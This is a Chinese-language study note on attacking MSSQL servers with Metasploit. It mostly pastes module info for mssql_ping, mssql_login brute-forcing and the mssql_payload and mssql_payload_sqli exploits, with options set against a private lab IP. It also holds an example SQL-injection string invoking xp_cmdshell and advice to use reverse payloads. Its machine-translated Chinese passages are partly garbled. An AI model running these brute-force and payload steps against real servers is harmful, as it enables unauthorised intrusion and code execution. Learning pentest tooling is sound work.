学习笔记
使用metasploit对MSSQL渗透测试方法(因为本人靶机没有mssql服务,所以只有方法hh)
第一步,使用mssql_ping获取信息
Name: MSSQL Ping Utility
Module: auxiliary/scanner/mssql/mssql_ping
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
MC <mc@metasploit.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD qwer no The password for the specified username
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 200 yes The number of concurrent threads (max one per host)
USERNAME root no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
Description:
This module simply queries the MSSQL instance for information.
第二步,使用mssql_login暴力破解
Name: MSSQL Login Utility
Module: auxiliary/scanner/mssql/mssql_login
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
MC <mc@metasploit.com>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD qwer no A specific password to authenticate with
PASS_FILE passwords.txt no File containing passwords, one per line
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 200 yes The number of concurrent threads (max one per host)
USERNAME root no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
VERBOSE true yes Whether to print output for all attempts
Description:
This module simply queries the MSSQL instance for a specific
user/pass (default is sa with blank).
References:
https://nvd.nist.gov/vuln/detail/CVE-1999-0506
第三步,使用mssql_payload提权
Name: Microsoft SQL Server Payload Execution
Module: exploit/windows/mssql/mssql_payload
Platform: Windows
Arch: x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2000-05-30
Provided by:
David Kennedy "ReL1K" <kennedyd013@gmail.com>
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
METHOD cmd yes Which payload delivery method to use (ps, cmd, or old)
PASSWORD qwer no The password for the specified username
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local m
achine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
URIPATH no The URI to use for this exploit (default is random)
USERNAME root no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
Payload information:
Description:
This module executes an arbitrary payload on a Microsoft SQL Server
by using the "xp_cmdshell" stored procedure. Currently, three
delivery methods are supported. First, the original method uses
Windows 'debug.com'. File size restrictions are avoided by
incorporating the debug bypass method presented by SecureStat at
Defcon 17. Since this method invokes ntvdm, it is not available on
x64 systems. A second method takes advantage of the Command Stager
subsystem. This allows using various techniques, such as using a
TFTP server, to send the executable. By default the Command Stager
uses 'wcsript.exe' to generate the executable on the target.
Finally, ReL1K's latest method utilizes PowerShell to transmit and
recreate the payload on the target. NOTE: This module will leave a
payload executable on the target system when the attack is finished.
此模块在Microsoft SQL Server上执行任意负载
通过使用“xp\u cmdshell”存储过程。目前,有三支持传递方式。首先,原始方法使用
Windows“debug.com”。文件大小限制可以通过结合SecureStat在
由于此方法调用ntvdm,因此在上不可用x64系统。第二种方法利用Command Stager
子系统。这允许使用各种技术,例如使用TFTP服务器,发送可执行文件。默认情况下,命令Stager
使用“wcsript.exe”在目标上生成可执行文件。最后,ReL1K的最新方法利用PowerShell来传输
在目标上重新创建有效负载。注意:本模块将留下攻击完成时目标系统上可执行的有效负载。
References:
https://nvd.nist.gov/vuln/detail/CVE-2000-0402
OSVDB (557)
http://www.securityfocus.com/bid/1281
https://nvd.nist.gov/vuln/detail/CVE-2000-1209
OSVDB (15757)
http://www.securityfocus.com/bid/4797
使用这个攻击模块记得更改payload
Name: Microsoft SQL Server Payload Execution via SQL Injection
Module: exploit/windows/mssql/mssql_payload_sqli
Platform: Windows
Arch: x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2000-05-30
Provided by:
David Kennedy "ReL1K" <kennedyd013@gmail.com>
jduck <jduck@metasploit.com>
Rodrigo Marcos
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COOKIE no Cookie value
DATA no POST data, if necessary, with [SQLi] indicating the injection
DELIVERY OLD yes Payload delivery method (Accepted: PS, CMD, OLD)
GET_PATH / yes The complete path with [SQLi] indicating the injection
METHOD GET yes GET or POST
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.112 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0
.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload information:
Avoid: 27 characters
Description:
This module will execute an arbitrary payload on a Microsoft SQL
Server, using a SQL injection vulnerability. Once a vulnerability is
identified this module will use xp_cmdshell to upload and execute
Metasploit payloads. It is necessary to specify the exact point
where the SQL injection vulnerability happens. For example, given
the following injection: http://www.example.com/show.asp?id=1;exec
xp_cmdshell 'dir';--&cat=electrical you would need to set the
following path: set GET_PATH
/showproduct.asp?id=1;[SQLi];--&cat=foobar In regard to the payload,
unless there is a closed port in the web server, you dont want to
use any "bind" payload, specially on port 80, as you will stop
reaching the vulnerable web server host. You want a "reverse"
payload, probably to your port 80 or to any other outbound port
allowed on the firewall. For privileged ports execute Metasploit
msfconsole as root. Currently, three delivery methods are supported.
First, the original method uses Windows 'debug.com'. File size
restrictions are avoided by incorporating the debug bypass method
presented by SecureStat at Defcon 17. Since this method invokes
ntvdm, it is not available on x64 systems. A second method takes
advantage of the Command Stager subsystem. This allows using various
techniques, such as using a TFTP server, to send the executable. By
default the Command Stager uses 'wcsript.exe' to generate the
executable on the target. Finally, ReL1K's latest method utilizes
PowerShell to transmit and recreate the payload on the target. NOTE:
This module will leave a payload executable on the target system
when the attack is finished.
此模块将在Microsoft SQL上执行任意负载服务器,使用SQL注入漏洞。一旦发现漏洞
确定此模块将使用xp\u cmdshell上载和执行Metasploit有效载荷。必须指定准确的点
发生SQL注入漏洞的地方。例如,给定以下注射:http://www.example.com/show.asp?id=1;执行
xpïcmdshell'dir'--&cat=电气您需要设置以下路径:设置GET\u路径
/showproduct.asp?id=1[SQLi]--&cat=有效载荷的foobar,除非web服务器中有一个关闭的端口,否则您不希望
使用任何“绑定”负载,特别是在端口80上,因为您将停止访问易受攻击的web服务器主机。你想要“反转”
有效负载,可能到您的端口80或任何其他出站端口在防火墙上允许。对于特权端口,执行Metasploit
msfconsole作为根目录。目前,支持三种交付方式。首先,原始方法使用Windows“debug.com”。文件大小
通过合并debug bypass方法可以避免限制由SecureStat在Defcon 17上提供。因为此方法调用
ntvdm,在x64系统上不可用。第二种方法需要命令级子系统的优点。这允许使用各种
发送可执行文件的技术,例如使用TFTP服务器。由默认情况下,命令Stager使用“wcsript.exe”生成
目标上的可执行文件。最后,ReL1K的最新方法PowerShell在目标上传输和重新创建有效负载。注:
该模块将在目标系统上留下一个有效负载可执行文件当攻击结束时。
References:
https://nvd.nist.gov/vuln/detail/CVE-2000-0402
OSVDB (557)
http://www.securityfocus.com/bid/1281
https://nvd.nist.gov/vuln/detail/CVE-2000-1209
OSVDB (15757)
http://www.securityfocus.com/bid/4797
http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/